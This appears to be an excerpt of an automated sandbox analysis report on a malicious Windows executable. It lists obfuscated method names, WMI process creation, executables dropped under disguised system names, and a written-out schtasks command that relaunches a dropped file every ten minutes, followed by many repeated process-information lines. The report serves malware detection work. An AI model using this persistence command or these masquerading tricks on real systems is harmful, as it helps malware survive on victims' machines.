            Source: oFAjWuoHBq.exe, XTd0rLoTv41DkMqoBIY.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'sXSIool5q8', 'oQ2Yy8Smnm', 'r8YINUg6D9', 'LMIn354tvIukqAp6tRl', 'qBPUTs4g7qqYamiTp1k', 'pmbv60490sXpuIb9gKy', 'sw6M7K4d0plCT3jljQ9', 'V5D2Q14fVnoDhq2tpxq'
            Source: oFAjWuoHBq.exe, JJmQaxCpfAKCpS000WB.csHigh entropy of concatenated method names: 'pqPCKBwm9j', 'e5WcLYskw7VbZ6bIEQ9', 'lQ8AlSsV6IJwuUIPE2d', 'UxHulKsMS6a7rjh1RK4', 'yBgrTAs4XQ5fDDWGl29', 'KEW1AfsODHDm8RyCcF7', 'QLw', 'YZ8', 'cC5', 'G9C'
            Source: oFAjWuoHBq.exe, Fp6jV7oIefceMgqQwwc.csHigh entropy of concatenated method names: '_5u9', 'hj6IPEjjQw', 'XEOYFsU3Ik', 'cf4I0cBbL6', 'yNbNkPMHwmNWxCQmrlP', 'qKyJQ1McMaabCTaYRtn', 'qN7UFZMLapj6Baq9t5y', 'b4BCPGMxqod1tGV3xUw', 'MRXSKMMT6LZBTVU50fC', 'rpbdiAMzyUBAhdNH5qK'
            Source: oFAjWuoHBq.exe, beWCLsCJbdIw88JXIMD.csHigh entropy of concatenated method names: 'OqxCUmhLMK', 'jd1veMNBLl8FyUYwAGM', 'owtXbQN20ARQximHxnL', 'SdexPLNdRvtwBpXxASV', 'YqWtAUNfIvyYT6OhZ86', 'TYcA5BNAb9024skFOKM', 'AhqVhpN8LwiqpE1FeGy', 'kb5DvVNvcuoDt99QYpM', 'jBKdawNbFnlCXodldUk', 'f28'
            Source: oFAjWuoHBq.exe, SvH61X176uYX1ShoZb7.csHigh entropy of concatenated method names: 'GmsH2S12D9', 'GrECJNCal72QAHrjj2p', 'ekBvBfCUjTkjt3qMqyu', 'kMRG4lCPvopF6K0fQR7', 's4xfakCJl2qAhhWEomW', '_1fi', 'OT3sODYavF', '_676', 'IG9', 'mdP'

            Persistence and Installation Behavior

            barindex
            Creates processes via WMI
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Drops executable to a common third party application directory
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile written: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile created: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeJump to dropped file
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile created: C:\Users\Public\AccountPictures\Registry.exeJump to dropped file
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile created: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeJump to dropped file
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile created: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeJump to dropped file
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile created: C:\Users\user\StartMenuExperienceHost.exeJump to dropped file
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile created: C:\Users\user\StartMenuExperienceHost.exeJump to dropped file

            Boot Survival

            barindex
            Drops PE files to the user root directory
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile created: C:\Users\user\StartMenuExperienceHost.exeJump to dropped file
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess information set: NOOPENFILEERRORBOX
